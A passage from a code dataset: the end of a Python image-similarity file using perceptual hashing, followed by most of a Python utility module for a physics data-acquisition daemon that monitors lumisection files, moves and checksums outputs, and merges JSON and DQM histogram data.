res\n\n# perceptual hash (pHash) algorithm\ndef pHash(img):\n    img = cv2.resize(img, (32, 32))\n    # convert to grayscale\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    # convert the grayscale image to float, then apply the DCT\n    dct = cv2.dct(np.float32(gray))\n    # mask operation: keep only the top-left 8x8 block of DCT coefficients\n    dct_roi = dct[0:8, 0:8]\n\n    hash = []\n    avreage = np.mean(dct_roi)\n    for i in range(dct_roi.shape[0]):\n        for j in range(dct_roi.shape[1]):\n            if dct_roi[i, j] > avreage:\n                hash.append(1)\n            else:\n                hash.append(0)\n    
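# each of the 64 bits records whether its DCT coefficient lies above the block mean\n    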
return hash\n\n# returns the Hamming distance: the larger the distance, the lower the similarity\ndef cmpHash(hash1, hash2):\n    n = 0\n    # hashes must have the same length, otherwise the arguments are invalid\n    assert len(hash1) == len(hash2)\n    # compare bit by bit\n    for i in range(len(hash1)):\n        # count differing bits; n is the final distance\n        if hash1[i] != hash2[i]:\n            n = n + 1\n    return n\ndef similarity_by_phash(imgA, imgB):\n    return 1 / cmpHash(pHash(imgA), pHash(imgB))\n\n'''\nMethods that work well:\n\n'''\ndef getSimilarity(imgA, imgB, method):\n    similarity = None\n    if method == 'hist':\n        similarity = calc_similar(imgA, imgB)\n    elif method == 'ssim':\n        similarity = compare_ssim(imgA, imgB, multichannel=True)\n    elif method == 'phash':\n        similarity = similarity_by_phash(imgA, imgB)\n    elif method == 'cos':\n        similarity = image_similarity_vectors_via_numpy(imgA, imgB)\n    # print(similarity)\n    return similarity","repo_name":"CaoAnda/Multi-image_stitching","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"35948424960","text":"import sys,traceback\nimport os,stat\nimport time,datetime\nimport shutil\nimport json\nimport logging\nimport zlib\nimport subprocess\nimport threading\n#import fcntl\n\nfrom inotifywrapper import InotifyWrapper\nimport inotify._inotify as inotify\nimport _zlibextras as zlibextras\n\nES_DIR_NAME = \"TEMP_ES_DIRECTORY\"\n#file types\nUNKNOWN,OUTPUTJSD,DEFINITION,STREAM,INDEX,FAST,SLOW,PROCMON,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT,INI,EOLS,BOLS,EOR,COMPLETE,DAT,PDAT,PJSNDATA,PIDPB,PB,CRASH,MODULELEGEND,PATHLEGEND,INPUTLEGEND,BOX,QSTATUS,FLUSH,PROCESSING = list(range(29))\nTO_ELASTICIZE = [STREAM,INDEX,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT,EOLS,EOR,COMPLETE,FLUSH]\nTEMPEXT = \".recv\"\nSTREAMERRORNAME = 'streamError'\nTHISHOST = os.uname()[1]\n\ndef setHostUtils(host):\n    global THISHOST\n    THISHOST=host\n\njsdCache = {}\n\nbw_cnt = 0\n\n##Output redirection class\n#class stdOutLog:\n#    def __init__(self):\n#        self.logger = logging.getLogger(self.__class__.__name__)\n#    def write(self, message):\n#        self.logger.debug(message)\n#class stdErrorLog:\n#    def __init__(self):\n#        self.logger = logging.getLogger(self.__class__.__name__)\n#    def write(self, message):\n#        self.logger.error(message)\n\ndef decodecstr(raw):return raw if isinstance(raw,str) else raw.decode(\"utf-8\") if raw is not None else \"\"\n\n\n    #on notify, put the event file in a queue\nclass MonitorRanger:\n\n    def __init__(self,recursiveMode=False):\n        self.logger = logging.getLogger(self.__class__.__name__)\n        self.eventQueue = False\n        self.inotifyWrapper = InotifyWrapper(self,recursiveMode)\n        self.queueStatusPath = None\n        self.queueStatusPathMon = None\n        self.queueStatusPathDir = None\n        self.queuedLumiList = []\n        self.maxQueuedLumi=-1\n        #max seen/closed by anelastic thread\n        self.maxReceivedEoLS=-1\n        self.maxClosedLumi=-1\n        self.numOpenLumis=-1\n        self.maxCMSSWLumi=-1\n        self.maxLSWithOutput=-1\n        self.lock = threading.Lock()\n\n        self.output_bw=0\n        self.lumi_bw=0\n\n        self.data_size_ls_num = 0\n        self.data_size_val = 0\n        self.data_size_last_update = 0\n\n        self.statsCollectorThread = None\n\n    def startStatsCollector(self):\n        self.statsCollectorThread = threading.Thread(target=self.statsCollector)\n        self.statsCollectorThread.daemon=True #set as daemon thread (not blocking process termination)\n        self.statsCollectorThread.start()\n\n    def statsCollector(self):\n        global bw_cnt\n        bw_cnt_time=None\n        while True:\n            new_time = time.time()\n            if bw_cnt_time is not None:\n                d_t = new_time-bw_cnt_time\n                if d_t!=0:\n                    self.output_bw=bw_cnt//d_t\n                    
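# reset the byte counter so the next interval measures fresh output bandwidth\n                    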
bw_cnt=0\n bw_cnt_time=new_time\n\n #refresh last completed lumi BW\n if self.data_size_ls_num>0:\n if new_time - self.data_size_last_update < 60:\n self.lumi_bw=self.data_size_val/23.31\n else:\n self.lumi_bw=0.\n if self.queueStatusPathDir and not os.path.exists(self.queueStatusPathDir):\n self.logger.info('no queue status dir yet.')\n else:\n self.updateQueueStatusFile(\".statsCollector\")\n time.sleep(23.4)\n\n def register_inotify_path(self,path,mask):\n self.inotifyWrapper.registerPath(path,mask)\n\n def start_inotify(self):\n self.inotifyWrapper.start()\n\n def stop_inotifyTimeout(self,timeout):\n self.logger.info(\"MonitorRanger: Stop inotify wrapper\")\n self.inotifyWrapper.stop()\n self.logger.info(\"MonitorRanger: Join inotify wrapper\")\n self.inotifyWrapper.join(timeout)\n if self.inotifyWrapper.isAlive():\n self.logger.info(\"MonitorRanger: Inotify wrapper join timeout (\"+str(timeout)+\")\")\n return False\n else:\n self.logger.info(\"MonitorRanger: Inotify wrapper returned\")\n return True\n\n def stop_inotify(self):\n self.logger.info(\"MonitorRanger: Stop inotify wrapper\")\n self.inotifyWrapper.stop()\n self.logger.info(\"MonitorRanger: Join inotify wrapper\")\n self.inotifyWrapper.join()\n self.logger.info(\"MonitorRanger: Inotify wrapper returned\")\n\n def process_default(self, event):\n self.logger.debug(\"event: %s on: %s\" %(str(event.mask),event.fullpath))\n if self.eventQueue:\n\n if self.queueStatusPath is not None:\n if self.checkNewLumi(event):\n self.eventQueue.put(event)\n else:\n self.eventQueue.put(event)\n\n def setEventQueue(self,queue):\n self.eventQueue = queue\n\n def checkNewLumi(self,event):\n if event.fullpath.endswith(\"_EoLS.jsn\"):\n try:\n queuedLumi = int(os.path.basename(event.fullpath).split('_')[1][2:])\n self.lock.acquire()\n if queuedLumi not in self.queuedLumiList:\n if queuedLumi>self.maxQueuedLumi:\n self.maxQueuedLumi=queuedLumi\n self.queuedLumiList.append(queuedLumi)\n self.lock.release()\n self.updateQueueStatusFile(\".checkNewLumi\")\n else:\n self.lock.release()\n #skip if EoL for LS in queue has already been written once (e.g. 
double file create race)\n return False\n except Exception as ex:\n self.logger.warning(\"Problem checking new EoLS filename: \"+str(os.path.basename(event.fullpath)) + \" error:\"+str(ex))\n try:self.lock.release()\n except:pass\n #delete associated BoLS file\n try:\n os.unlink(event.fullpath[:event.fullpath.rfind(\"_EoLS.jsn\")]+\"_BoLS.jsn\")\n except:\n pass\n elif event.fullpath.endswith(\"_BoLS.jsn\"):\n try:\n queuedLumi = int(os.path.basename(event.fullpath).split('_')[1][2:])\n if queuedLumi>self.maxCMSSWLumi:\n self.maxCMSSWLumi = queuedLumi\n self.updateQueueStatusFile(\".checkNewLumi\")\n except:\n pass\n #not passed to the queue\n return False\n return True\n\n def notifyLumi(self,ls,maxReceivedEoLS,maxClosedLumi,numOpenLumis):\n if self.queueStatusPath is None:return\n self.lock.acquire()\n if ls is not None and ls in self.queuedLumiList:\n self.queuedLumiList.remove(ls)\n self.maxReceivedEoLS=maxReceivedEoLS\n self.maxClosedLumi=maxClosedLumi\n self.numOpenLumis=numOpenLumis\n self.lock.release()\n self.updateQueueStatusFile(\".notifyLumi\")\n\n def notifyMaxLsWithOutput(self,ls):\n self.maxLSWithOutput=max(ls,self.maxLSWithOutput)\n\n def setQueueStatusPath(self,path,monpath):\n self.queueStatusPath = path\n self.queueStatusPathMon = monpath\n self.queueStatusPathDir = path[:path.rfind('/')]\n\n def updateQueueStatusFile(self,tmpsuffix):\n if self.queueStatusPath is None:return\n num_queued_lumis = len(self.queuedLumiList)\n if not os.path.exists(self.queueStatusPathDir):\n self.logger.error(\"No directory to write queueStatusFile: \"+str(self.queueStatusPathDir))\n else:\n self.logger.info(\"Update status file - queued lumis:\"+str(num_queued_lumis)+ \" EoLS:: max queued:\"+str(self.maxQueuedLumi) \\\n +\" un-queued:\"+str(self.maxReceivedEoLS)+\" Lumis:: last closed:\"+str(self.maxClosedLumi) \\\n + \" num open:\"+str(self.numOpenLumis) + \" max LS in cmssw:\"+str(self.maxCMSSWLumi))\n #write json\n doc = {\"numQueuedLS\":num_queued_lumis,\n \"maxQueuedLS\":self.maxQueuedLumi,\n \"numReadFromQueueLS:\":self.maxReceivedEoLS,\n \"maxClosedLS\":self.maxClosedLumi,\n \"numReadOpenLS\":self.numOpenLumis,\n \"CMSSWMaxLS\":self.maxCMSSWLumi,\n \"maxLSWithOutput\":self.maxLSWithOutput,\n \"outputBW\": self.output_bw,\n \"lumiBW\": self.lumi_bw\n }\n \n if self.queueStatusPath is not None:\n attempts=3\n while attempts>0:\n try:\n #copy to main hltd\n tmpjson=json.dumps(doc)\n with open(self.queueStatusPath+tmpsuffix+TEMPEXT,\"w\") as fp:\n json.dump(doc,fp)\n os.rename(self.queueStatusPath+tmpsuffix+TEMPEXT,self.queueStatusPath)\n #copy to monitoring directory\n try:\n shutil.copyfile(self.queueStatusPath,self.queueStatusPathMon)\n except:\n pass\n break\n except Exception as ex:\n attempts-=1\n if attempts==0:\n self.logger.error(\"Unable to open/write \" + self.queueStatusPath)\n self.logger.exception(ex)\n else:\n self.logger.warning(\"Unable to write status file, with error:\" + str(ex)+\".retrying...\")\n time.sleep(0.05)\n\n\nclass fileHandler(object):\n def __eq__(self,other):\n return self.filepath == other.filepath\n\n def __getattr__(self,name):\n if name not in self.__dict__:\n if name in [\"dir\",\"ext\",\"basename\",\"name\"]: self.getFileInfo()\n elif name in [\"filetype\"]: self.filetype = self.getFiletype()\n elif name in [\"run\",\"ls\",\"stream\",\"index\",\"pid\",\"tid\"]: self.getFileHeaders()\n elif name in [\"data\"]: self.data = self.getData()\n elif name in [\"definitions\"]: self.getDefinitions()\n elif name in [\"host\"]: self.host = THISHOST\n if name 
in [\"ctime\"]: self.ctime = self.getTime('c')\n if name in [\"mtime\"]: self.mtime = self.getTime('m')\n if name in [\"mtimems\"]: self.mtimems = self.getTimeEms('m')\n return self.__dict__[name]\n\n def __init__(self,filepath,filetype=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.filepath = filepath\n if filetype: self.filetype = filetype\n self.outDir = self.dir\n self.mergeStage = 0\n self.inputs = []\n self.inputData = []\n\n def getTime(self,t):\n if self.exists():\n if t == 'c':\n dt=os.path.getctime(self.filepath)\n elif t == 'm':\n dt=os.path.getmtime(self.filepath)\n time_fmt = datetime.datetime.utcfromtimestamp(dt).isoformat()\n return time_fmt\n return None\n\n def getTimeEms(self,t):\n if self.exists():\n if t == 'c':\n timestamp=os.path.getctime(self.filepath)\n elif t == 'm':\n timestamp=os.path.getmtime(self.filepath)\n return timestamp*1000\n return None\n\n def getFileInfo(self):\n self.dir = os.path.dirname(self.filepath)\n self.basename = os.path.basename(self.filepath)\n self.name,self.ext = os.path.splitext(self.basename)\n\n def getFiletype(self,filepath = None):\n if not filepath: filepath = self.filepath\n filename = self.basename\n name,ext = self.name,self.ext\n if ext==TEMPEXT:return UNKNOWN\n name = name.upper()\n if \"/mon\" not in filepath:\n if ext == \".dat\" and \"_PID\" not in name: return DAT\n if ext == \".dat\" and \"_PID\" in name: return PDAT\n if ext == \".jsndata\" and \"_PID\" in name: return PJSNDATA\n if ext == \".ini\" and \"_PID\" in name: return INI\n if ext == \".jsd\" and \"OUTPUT_\" in name: return OUTPUTJSD\n if ext == \".jsd\" : return DEFINITION\n if ext == \".jsn\":\n if STREAMERRORNAME.upper() in name: return STREAMERR\n elif \"_STREAM\" in name and \"_PID\" in name: return STREAM\n elif \"_INDEX\" in name and \"_PID\" in name: return INDEX\n elif \"_CRASH\" in name and \"_PID\" in name: return CRASH\n elif \"_EOLS\" in name: return EOLS\n elif \"_BOLS\" in name: return BOLS\n elif \"_EOR\" in name: return EOR\n if ext==\".jsn\":\n if \"_STREAM\" in name and \"_PID\" not in name: return OUTPUT\n if name.startswith(\"QUEUE_STATUS\"): return QSTATUS\n if name.startswith(\"SLOWMONI\"): return SLOW\n if name.startswith(\"PROCMON\"): return PROCMON\n if ext==\".pb\":\n #if \"_PID\" not in name: return PB\n if \"_PID\" not in name: return UNKNOWN\n else: return PIDPB\n if ext == \".ini\" and \"/mon\" in filepath: return INI\n if name.endswith(\"COMPLETE\"): return COMPLETE\n if ext == \".fast\" in filename: return FAST\n if name.startswith(\"MICROSTATELEGEND\"): return MODULELEGEND\n if name.startswith(\"PATHLEGEND\"): return PATHLEGEND\n if name.startswith(\"INPUTLEGEND\"): return INPUTLEGEND\n if \"boxes\" in filepath : return BOX\n if filename == 'flush': return FLUSH\n if filename == 'processing': return PROCESSING\n return UNKNOWN\n\n\n def getFileHeaders(self):\n filetype = self.filetype\n name,ext = self.name,self.ext\n splitname = name.split(\"_\")\n if filetype in [STREAM,INI,PDAT,PJSNDATA,PIDPB,CRASH]: self.run,self.ls,self.stream,self.pid = splitname\n elif filetype == SLOW:\n try:\n slowname,self.ls,self.pid,self.tid = splitname\n except:\n slowname,self.ls,self.pid = splitname\n self.tid=None\n elif filetype == FAST:\n try:\n self.run,self.pid,self.tid = splitname\n except:\n self.run,self.pid = splitname\n self.tid=None\n\n elif filetype == PROCMON:\n try:\n pmonname,self.ls,self.pid,self.tid = splitname\n except:\n pmonname,self.ls,self.pid = splitname\n self.tid=None\n\n elif filetype in 
[DAT,PB,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT]: self.run,self.ls,self.stream,self.host = splitname\n elif filetype == INDEX: self.run,self.ls,self.index,self.pid = splitname\n elif filetype in [EOLS,BOLS]: self.run,self.ls,self.eols = splitname\n else:\n self.logger.warning(\"Bad filetype: %s\" %self.filepath)\n self.run,self.ls,self.stream = [None]*3\n\n def getData(self):\n if self.ext == '.jsn': return self.getJsonData()\n elif self.filetype == BOX: return self.getBoxData()\n return None\n\n def getBoxData(self,filepath = None):\n if not filepath: filepath = self.filepath\n try:\n with open(filepath,'r') as fi:\n data = json.load(fi)\n except IOError as e:\n data = {}\n except Exception as e:\n # self.logger.exception(e)\n self.logger.warning('Box parse error:'+str(e))\n data = {}\n return data\n\n #get data from json file\n def getJsonData(self,filepath = None):\n if not filepath: filepath = self.filepath\n try:\n with open(filepath) as fi:\n data = json.load(fi)\n #except json.scanner.JSONDecodeError as e:\n except json.JSONDecodeError as e:\n self.logger.exception(e)\n data = {}\n except Exception as e:\n self.logger.exception(e)\n data = {}\n return data\n\n def setJsdfile(self,jsdfile):\n self.jsdfile = jsdfile\n if self.filetype in [OUTPUT,STREAMDQMHISTOUTPUT,CRASH,STREAMERR]: self.initData()\n\n def initData(self):\n defs = self.definitions\n self.data = {}\n if defs:\n self.data[\"data\"] = [self.nullValue(f[\"type\"]) for f in defs]\n\n def nullValue(self,ftype):\n if ftype == \"integer\": return \"0\"\n elif ftype == \"string\": return \"\"\n else:\n self.logger.warning(\"bad field type %r\" %(ftype))\n return \"ERR\"\n\n def checkSources(self):\n data,defs = self.data,self.definitions\n for item in defs:\n fieldName = item[\"name\"]\n index = defs.index(item)\n if \"source\" in item:\n source = item[\"source\"]\n sIndex,ftype = self.getFieldIndex(fieldName) #TODO:pyflakes gives warning..\n data[index] = data[sIndex]\n\n def getFieldIndex(self,field):\n defs = self.definitions\n if defs:\n index = next((defs.index(item) for item in defs if item[\"name\"] == field),-1)\n ftype = defs[index][\"type\"]\n return index,ftype\n\n\n def getFieldByName(self,field):\n index,ftype = self.getFieldIndex(field)\n data = self.data[\"data\"]\n if index > -1:\n value = int(data[index]) if ftype == \"integer\" else str(data[index])\n return value\n else:\n self.logger.warning(\"bad field request %r in %r\" %(field,self.definitions))\n return None\n\n def setFieldByName(self,field,value,warning=True):\n index,ftype = self.getFieldIndex(field)\n data = self.data[\"data\"]\n if index > -1:\n data[index] = value\n return True\n else:\n if warning==True:\n self.logger.warning(\"bad field request %r in %r\" %(field,self.definitions))\n return False\n\n def setBaseFieldByName(self,field,value):\n self.data[field]=value\n\n #get definitions from jsd file\n def getDefinitions(self):\n if self.filetype in [STREAM]:\n #try:\n self.jsdfile = self.data[\"definition\"]\n #except:\n # self.logger.error(\"no definition field in \"+str(self.filepath))\n # self.definitions = {}\n # return False\n elif not self.jsdfile:\n self.logger.warning(\"jsd file not set\")\n self.definitions = []\n return False\n if self.jsdfile not in jsdCache:\n jsdCache[self.jsdfile] = self.getJsonData(self.jsdfile)\n self.definitions = jsdCache[self.jsdfile][\"data\"]\n #self.definitions = self.getJsonData(self.jsdfile)[\"data\"]\n return True\n\n def setDefinitions(self,jsdfile):\n if self.filetype in [STREAM]:\n #try:\n self.jsdfile 
= jsdfile\n #except:\n # self.logger.error(\"no definition field in \"+str(self.filepath))\n # self.definitions = {}\n # return False\n elif not self.jsdfile:\n self.logger.warning(\"jsd file not set\")\n self.definitions = []\n return False\n if self.jsdfile not in jsdCache:\n jsdCache[self.jsdfile] = self.getJsonData(self.jsdfile)\n self.definitions = jsdCache[self.jsdfile][\"data\"]\n #self.definitions = self.getJsonData(self.jsdfile)[\"data\"]\n return True\n\n def deleteFile(self,silent=False):\n #return True\n filepath = self.filepath\n if silent==False:\n self.logger.info(filepath)\n if os.path.isfile(filepath):\n try:\n os.remove(filepath)\n except Exception as e:\n self.logger.exception(e)\n return False\n return True\n\n def moveFile(self,newpath,copy = False,adler32=False,silent=False, createDestinationDir=True, missingDirAlert=True, missingDirAssert=False, updateFileInfo=True):\n checksum=1\n #if not self.exists(): return True,checksum #should return False (below)\n oldpath = self.filepath\n newdir = os.path.dirname(newpath)\n\n if not os.path.exists(oldpath):\n self.logger.error(\"Source path does not exist: \" + oldpath)\n return False,checksum\n\n self.logger.info(\"%s -> %s\" %(oldpath,newpath))\n retries = 5\n #temp name with temporary host name included to avoid conflict between multiple hosts copying at the same time\n newpath_tmp = newpath+'_'+THISHOST+TEMPEXT\n while True:\n try:\n #few attempts at creating destination directory \n dir_missing_attempts=5\n while not os.path.isdir(newdir):\n dir_missing_attempts-=1\n if missingDirAssert:\n self.logger.fatal('Missing destination dir '+str(newdir) + '. Terminating script')\n os._exit(2)\n if dir_missing_attempts>=0 and createDestinationDir==False:\n continue\n if createDestinationDir==False:\n if silent==False and missingDirAlert==True:\n self.logger.error(\"Unable to transport file \"+str(oldpath)+\". Destination directory does not exist: \" + str(newdir))\n else:\n self.logger.warning(\"Unable to transport file \"+str(oldpath)+\". 
Destination directory does not exist: \" + str(newdir))\n                        return False,checksum\n                    elif dir_missing_attempts<0:\n                        self.logger.error(\"Unable to make directory \"+str(newdir))\n                        return False,checksum\n                    try:\n                        os.makedirs(newdir)\n                    except:\n                        #repeated check if dir was created in the meantime\n                        if not os.path.isdir(newdir):\n                            os.makedirs(newdir)\n\n                if adler32:checksum=self.moveFileAdler32(oldpath,newpath_tmp,copy)\n                else:\n                    if copy: shutil.copy(oldpath,newpath_tmp)\n                    else:\n                        shutil.move(oldpath,newpath_tmp)\n                break\n\n            except (OSError,IOError) as e:\n                if silent==False:\n                    if isinstance(e, IOError) and e.errno==2:\n                        self.logger.warning(\"Error in attempt to copy/move file to destination \" + newpath + \":\" + str(e))\n                    else:\n                        self.logger.exception(e)\n                retries-=1\n                if retries == 0:\n                    if silent==False:\n                        #do not print this warning if directory was removed\n                        if os.path.isdir(newdir):\n                            self.logger.error(\"Failure to move file \"+str(oldpath)+\" to \"+str(newpath_tmp))\n                        else:\n                            self.logger.warning(\"Failure to move file \"+str(oldpath)+\" to \"+str(newpath_tmp)+'.Target directory is gone')\n                    return False,checksum\n                else:\n                    time.sleep(0.5)\n            except Exception as e:\n                self.logger.exception(e)\n                raise e\n        #renaming\n        retries = 5\n        while True:\n            try:\n                os.rename(newpath_tmp,newpath)\n                break\n            except (OSError,IOError) as e:\n                if silent==False:\n                    if isinstance(e, IOError) and e.errno==2:\n                        self.logger.warning(\"Error encountered in attempt to copy/move file to destination \" + newpath + \":\" + str(e))\n                    elif isinstance(e, OSError) and e.errno==18:\n                        self.logger.warning(\"failed attempt to rename \" + newpath_tmp + \" to \" + newpath + \" error: \"+ str(e))\n                    else:\n                        self.logger.exception(e)\n                retries-=1\n                if retries == 0:\n                    if silent==False:\n                        #do not print this warning if directory was deleted\n                        if os.path.isdir(newdir):\n                            self.logger.error(\"Failure to rename temporary file \"+str(newpath_tmp)+\" to \"+str(newpath))\n                        else:\n                            self.logger.warning(\"Failure to rename temporary file \"+str(newpath_tmp)+\" to \"+str(newpath)+'.Target directory is gone')\n                    return False,checksum\n                else:\n                    time.sleep(0.5)\n            except Exception as e:\n                self.logger.exception(e)\n                raise e\n\n        if updateFileInfo:\n            self.filepath = newpath\n            self.getFileInfo()\n        return True,checksum\n\n    #move file (works only on src as file, not directory)\n    def moveFileAdler32(self,src,dst,copy):\n        global bw_cnt\n        if os.path.isdir(src):\n            raise shutil.Error(\"source `%s` is a directory\" % src)\n\n        if os.path.isdir(dst):\n            dst = os.path.join(dst, os.path.basename(src))\n\n        try:\n            if os.path.samefile(src, dst):\n                raise shutil.Error(\"`%s` and `%s` are the same file\" % (src, dst))\n        except OSError:\n            pass\n\n        #initial adler32 value\n        adler32c=1\n        #calculate checksum on the fly\n        with open(src, 'rb') as fsrc:\n            with open(dst, 'wb') as fdst:\n\n                length=16*1024\n                while 1:\n                    buf = fsrc.read(length)\n                    if not buf:\n                        break\n                    adler32c=zlib.adler32(buf,adler32c)\n                    fdst.write(buf)\n                    bw_cnt+=len(buf)\n\n        #copy mode bits on the destination file\n        st = os.stat(src)\n        mode = stat.S_IMODE(st.st_mode)\n        os.chmod(dst, mode)\n\n        if copy==False:os.unlink(src)\n        return adler32c\n\n\n    def mergeDatInputs(self,destinationpath,doChecksum,dropAtFU=False):\n        global bw_cnt\n        dirname = os.path.dirname(self.filepath)\n        ccomb=1\n        dst = None\n        adler32accum=1\n        json_size=0\n        copy_size=0\n        file_created=False\n        for input in self.inputs:\n            nproc = int(input.getFieldByName('Processed'))\n            nerr = int(input.getFieldByName('ErrorEvents'))\n            ifile = input.getFieldByName('Filelist')\n            
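# per-input metadata from the stream json: adler32 checksum and size of the partial dat file\n            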
ifilecksum = int(input.getFieldByName('FileAdler32'))\n ifilesize = int(input.getFieldByName('Filesize'))\n\n #no file to merge if n processed = 0\n if nproc==0:\n continue\n\n #if any of 'proper' files has checksum set to -1, disable the check and substitute -1 in output json\n if ifilecksum == -1:\n ccomb = -1\n doChecksum = False\n if doChecksum:\n ccomb = zlibextras.adler32_combine(ccomb,ifilecksum,ifilesize)\n\n json_size+=ifilesize\n\n #if going to merge, open input file\n if dst is None and not dropAtFU:\n try:\n dst = open(destinationpath,'wb')\n except IOError as ex:\n if ex.errno==2:\n self.logger.fatal('IOError opening destination file path '+ destinationpath + ' errno:'+str(ex.errno)+' .Terminating script')\n #assert (terminate script) if data destination dir is not available\n os._exit(6)\n raise ex\n\n length=16*1024\n adler32c=1\n file_size=0\n with open(os.path.join(dirname,ifile), 'rb') as fsrc:\n file_created=True\n while 1:\n buf = fsrc.read(length)\n if not buf:\n break\n read_len=len(buf)\n file_size+=read_len\n if doChecksum:\n adler32c=zlib.adler32(buf,adler32c)\n if dst:\n dst.write(buf)\n bw_cnt+=read_len\n copy_size += file_size\n #adler32c = adler32 & 0xffffffff\n if doChecksum and ifilecksum != (adler32c & 0xffffffff):\n self.logger.fatal(\"Checksum mismatch detected while reading file \" + ifile + \". expected:\"+str(ifilecksum)+\" obtained:\"+str(adler32c&0xffffffff))\n if file_size!=ifilesize:\n self.logger.fatal(\"Size mismatch is detected while reading file \" + ifile + \". expected:\"+str(ifilesize)+\" obtained:\"+str(file_size))\n if doChecksum:\n adler32accum = zlibextras.adler32_combine(adler32accum,adler32c,ifilesize) #& 0xffffffff\n\n if dst:\n dst.close()\n\n #delete input files\n for input in self.inputs:\n ifile = input.getFieldByName('Filelist')\n if not ifile:\n continue\n try:os.remove(os.path.join(dirname,ifile))\n except Exception as ex:\n self.logger.exception(ex)\n\n self.setFieldByName(\"Filesize\",json_size)\n if doChecksum:\n self.setFieldByName(\"FileAdler32\",ccomb & 0xffffffff)\n else:\n self.setFieldByName(\"FileAdler32\",-1)\n checks_pass = (ccomb == adler32accum or not doChecksum ) and (copy_size == json_size)\n self.logger.info('checks pass:'+str(checks_pass)+' created:'+str(file_created)+' size:'+str(copy_size))\n return checks_pass,copy_size\n\n def exists(self):\n return os.path.exists(self.filepath)\n\n #write self.outputData in json self.filepath\n def writeout(self,empty=False,verbose=True):\n filepath = self.filepath\n outputData = self.data\n self.logger.info(filepath)\n\n try:\n with open(filepath,\"w\") as fi:\n if empty==False:\n json.dump(outputData,fi)\n except Exception as e:\n if verbose:\n self.logger.exception(e)\n else:\n self.logger.warning('unable to writeout ' + filepath)\n return False\n return True\n\n #TODO:make sure that the file is copied only once\n def esCopy(self, keepmtime=True):\n if not self.exists(): return\n if self.filetype in TO_ELASTICIZE:\n esDir = os.path.join(self.dir,ES_DIR_NAME)\n if os.path.isdir(esDir):\n newpathTemp = os.path.join(esDir,self.basename+TEMPEXT)\n newpath = os.path.join(esDir,self.basename)\n retries = 5\n while True:\n try:\n if keepmtime:\n shutil.copy2(self.filepath,newpathTemp)\n else:\n shutil.copy(self.filepath,newpathTemp)\n break\n except (OSError,IOError) as e:\n retries-=1\n if retries == 0:\n self.logger.exception(e)\n return\n #raise e #non-critical exception\n else:\n time.sleep(0.5)\n retries = 5\n while True:\n try:\n os.rename(newpathTemp,newpath)\n break\n 
except (OSError,IOError) as e:\n retries-=1\n if retries == 0:\n self.logger.exception(e)\n return\n #raise e #non-critical exception\n else:\n time.sleep(0.5)\n\n\n def merge(self,infile):\n defs,oldData = self.definitions,self.data[\"data\"][:] #TODO: check infile definitions\n jsdfile = infile.jsdfile\n host = infile.host\n newData = infile.data[\"data\"][:]\n\n self.logger.debug(\"old: %r with new: %r\" %(oldData,newData))\n result=Aggregator(defs,oldData,newData).output()\n self.logger.debug(\"result: %r\" %result)\n self.data[\"data\"] = result\n self.data[\"definition\"] = jsdfile\n self.data[\"source\"] = host\n\n self.inputs.append(infile)\n pbOutput = False\n if self.filetype!=STREAMDQMHISTOUTPUT:\n #append list of files if this is json metadata stream\n try:\n findex,ftype = self.getFieldIndex(\"Filelist\")\n flist = newData[findex].split(',')\n for l in flist:\n if l.endswith('.jsndata'):\n if not l.startswith('/'):\n self.inputData.append(os.path.join(self.dir,l))\n else:\n self.inputData.append(l)\n elif l.endswith('.pb'):\n pbOutput=True\n except Exception as ex:\n self.logger.exception(ex)\n self.writeout()\n\n #detect streams with pb files as DQM Histogram streams and change outfile type\n if pbOutput:\n self.filetype = STREAMDQMHISTOUTPUT\n\n def updateData(self,infile):\n self.data[\"data\"]=infile.data[\"data\"][:]\n\n def isJsonDataStream(self):\n if len(self.inputData)>0:return True\n return False\n\n def mergeAndMoveJsnDataMaybe(self,outDir, removeInput=True, dropAtFU=False):\n if len(self.inputData):\n try:\n outfile = os.path.join(self.dir,self.name+'.jsndata')\n command_args = [\"jsonMerger\",outfile]\n for fid in self.inputData:\n command_args.append(fid)\n p = subprocess.Popen(command_args,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n p_out,p_err = map(decodecstr,p.communicate())\n #p_out,p_err = map(str,p.communicate())\n if p.returncode!=0:\n self.logger.error('jsonMerger returned with exit code '+str(p.returncode)+' and response: ' + str(p_out) + '. 
Merging parameters given:'+str(command_args))\n return False\n except Exception as ex:\n self.logger.exception(ex)\n return False\n if removeInput:\n for f in self.inputData:\n try:\n os.remove(f)\n except:\n pass\n try:\n self.setFieldByName(\"Filesize\",str(os.stat(outfile).st_size))\n self.setFieldByName(\"FileAdler32\",\"-1\")\n self.writeout()\n jsndatFile = fileHandler(outfile)\n if not dropAtFU:\n result,cs = jsndatFile.moveFile(os.path.join(outDir, os.path.basename(outfile)),adler32=False,createDestinationDir=False,missingDirAssert=True)\n if not result: return False\n else:\n jsndatFile.deleteFile()\n except Exception as ex:\n self.logger.error(\"Unable to copy jsonStream data file \"+str(outfile)+\" to output.\")\n self.logger.exception(ex)\n return False\n return True\n\n\n def mergeDQM(self,executable,install_dir,outDir,detFastHadd=True,setAsError=False):\n outputName,outputExt = os.path.splitext(self.basename)\n outputName+='.pb'\n fullOutputPath = os.path.join(outDir,outputName)\n if detFastHadd:\n command_args = [executable,install_dir,\"add\",\"-o\",fullOutputPath]\n else:\n command_args = [\"/usr/bin/fastHadd\",\"add\",\"-o\",fullOutputPath]\n\n totalEvents = self.getFieldByName(\"Processed\")+self.getFieldByName(\"ErrorEvents\")\n\n processedEvents = 0\n acceptedEvents = 0\n errorEvents = 0\n\n numFiles=0\n inFileSizes=[]\n for f in self.inputs:\n# try:\n fname = f.getFieldByName('Filelist')\n fullpath = os.path.join(outDir,fname)\n try:\n proc = f.getFieldByName('Processed')\n acc = f.getFieldByName('Accepted')\n err = f.getFieldByName('ErrorEvents')\n #self.logger.info('merging file : ' + str(fname) + ' counts:'+str(proc) + ' ' + str(acc) + ' ' + str(err))\n if fname:\n pbfsize = os.stat(fullpath).st_size\n inFileSizes.append(pbfsize)\n command_args.append(fullpath)\n numFiles+=1\n processedEvents+= proc\n acceptedEvents+= acc\n errorEvents+= err\n else:\n if proc>0:\n self.logger.info('no histograms pb file : 